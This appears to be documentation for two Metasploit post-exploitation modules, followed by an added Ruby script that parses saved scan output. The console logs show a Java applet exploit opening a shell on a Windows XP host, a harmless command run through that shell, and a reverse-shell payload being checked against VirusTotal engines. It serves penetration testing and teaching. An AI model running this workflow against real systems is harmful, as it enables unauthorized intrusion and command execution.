execute
This module executes an arbitrary command on an open session. Works on Windows, Linux, OSX and Unix platforms.
msf post(execute) >
[*] 10.10.0.100 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400
msf post(execute) > show options
Module options (post/multi/general/execute):
   Name     Current Setting       Required  Description
   ----     ---------------       --------  -----------
   COMMAND  echo hell > file.txt  no        The entire command line to execute on the session
   SESSION  1                     yes       The session to run this module on.
msf post(execute) > run
[*] Executing echo hell > file.txt on #<Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response:
[*] Post module execution completed
msf post(execute) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2CB7-2817
 Directory of C:\Documents and Settings\administrator\Desktop
08/31/2012  09:04 AM    <DIR>          .
08/31/2012  09:04 AM    <DIR>          ..
08/31/2012  09:04 AM                46 file.txt
12/29/2011  03:52 PM                70 portlist.txt
               2 File(s)          1,431 bytes
               2 Dir(s)   4,899,721,216 bytes free
C:\Documents and Settings\administrator\Desktop>
malware_check
This module uploads a file to virustotal.com, and displays the scan results. It can also be run directly from within a meterpreter session. Works on Windows, Linux, OSX and Unix platforms.
msf post(check_malware) > show options
Module options (post/multi/gather/check_malware):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   APIKEY                       yes       VirusTotal API key
   REMOTEFILE  C:\msfrev.exe    yes       A file to check from the remote machine
   SESSION     1                yes       The session to run this module on.
msf post(check_malware) > run
[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
AhnLab-V3 true 2015.11.26.00 Trojan/Win32.Shell 20151125
Alibaba false 1.0 20151125
Arcabit true 1.0.0.624 Trojan.Zusy.Elzob.D1F5F 20151125
Avast true 8.0.1489.320 Win32:SwPatch [Wrm] 20151125
Avira true 8.3.2.4 TR/Crypt.EPACK.Gen2 20151125
Baidu-International true 3.5.1.41473 Trojan.Win32.Rozena.AM 20151124
BitDefender true 7.2 Gen:Variant.Zusy.Elzob.8031 20151125
Bkav false 1.3.0.7383 20151125
ByteHero false 1.0.0.1 20151125
CAT-QuickHeal true 14.00 Trojan.Swrort.A 20151125
CMC false 1.1.0.977 20151124
ClamAV true 0.98.5.0 Win.Trojan.MSShellcode-7 20151125
Comodo true 23654 TrojWare.Win32.Rozena.A 20151125
Cyren true 5.4.16.7 W32/Swrort.A 20151125
DrWeb true 7.0.16.10090 Trojan.Swrort.1 20151125
ESET-NOD32 true 12622 a variant of Win32/Rozena.AM 20151125
Emsisoft true 3.5.0.642 Gen:Variant.Zusy.Elzob.8031 (B) 20151125
F-Prot true 4.7.1.166 W32/Swrort.A 20151125
F-Secure true 11.0.19100.45 Gen:Variant.Zusy.Elzob.8031 20151125
Fortinet true 5.1.220.0 W32/Swrort.C!tr 20151125
GData true 25 Gen:Variant.Zusy.Elzob.8031 20151125
Ikarus true T3.1.9.5.0 Trojan.Win32.Swrort 20151125
Jiangmin false 16.0.100 20151124
K7AntiVirus true 9.212.17966 Backdoor ( 04c53cce1 ) 20151125
K7GW true 9.212.17968 Backdoor ( 04c53cce1 ) 20151125
Kaspersky true 15.0.1.10 HEUR:Trojan.Win32.Generic 20151125
Malwarebytes true 2.1.1.1115 Backdoor.Bot.Gen 20151125
...snip...
[*] Post module execution completed
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe
[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
..snip..
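
As an added example (not part of the original page or of Metasploit itself), the Ruby below parses saved check_malware console output like that shown above into structured data for a triage record. The function names and the SAMPLE text, assembled from output lines on this page, are assumptions of this example.

```ruby
# Added example: parse saved check_malware console output (names are hypothetical).
# SAMPLE is constructed from output lines shown on this page.
SAMPLE = <<~'LOG'
  [*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
  [*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
  [*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
  [*] Analysis Report: C:\msfrev.exe (38 / 55):
  Antivirus Detected Version Result Update
  --------- -------- ------- ------ ------
  AegisLab false 1.5 20151125
  ClamAV true 0.98.5.0 Win.Trojan.MSShellcode-7 20151125
  ESET-NOD32 true 12622 a variant of Win32/Rozena.AM 20151125
  K7GW true 9.212.17968 Backdoor ( 04c53cce1 ) 20151125
  ...snip...
LOG

HASH_LEN = { 'MD5' => 32, 'SHA1' => 40, 'SHA256' => 64 }.freeze
Row = Struct.new(:engine, :detected, :version, :result, :update)

def parse_report(text)
  report = { hashes: {}, rows: [], file: nil, positives: nil, total: nil }
  text.each_line do |raw|
    line = raw.strip
    if (m = line.match(/\b(MD5|SHA1|SHA256): (\h+)\z/))
      report[:hashes][m[1]] = m[2].downcase
    elsif (m = line.match(%r{Analysis Report: (.+) \((\d+) / (\d+)\):\z}))
      report[:file] = m[1]
      report[:positives] = m[2].to_i
      report[:total] = m[3].to_i
    # Result may be empty or contain spaces, so anchor on the trailing 8-digit date.
    elsif (m = line.match(/\A(\S+)\s+(true|false)\s+(\S+)\s*(.*?)\s*(\d{8})\z/))
      report[:rows] << Row.new(m[1], m[2] == 'true', m[3], m[4], m[5])
    end
  end
  report
end

def summarize(report)
  flagged = report[:rows].select(&:detected)
  {
    sha256: report[:hashes]['SHA256'],
    malformed_hashes: report[:hashes].reject { |k, v| v.length == HASH_LEN[k] }.keys,
    header_ratio: [report[:positives], report[:total]],
    truncated: report[:rows].size < report[:total].to_i, # table was snipped
    labels: flagged.map { |r| [r.engine, r.result] }.to_h
  }
end

puts summarize(parse_report(SAMPLE)) if __FILE__ == $PROGRAM_NAME
```

The `truncated` flag matters for output such as this page's, where `...snip...` cuts the table short: the header ratio is then the only complete count.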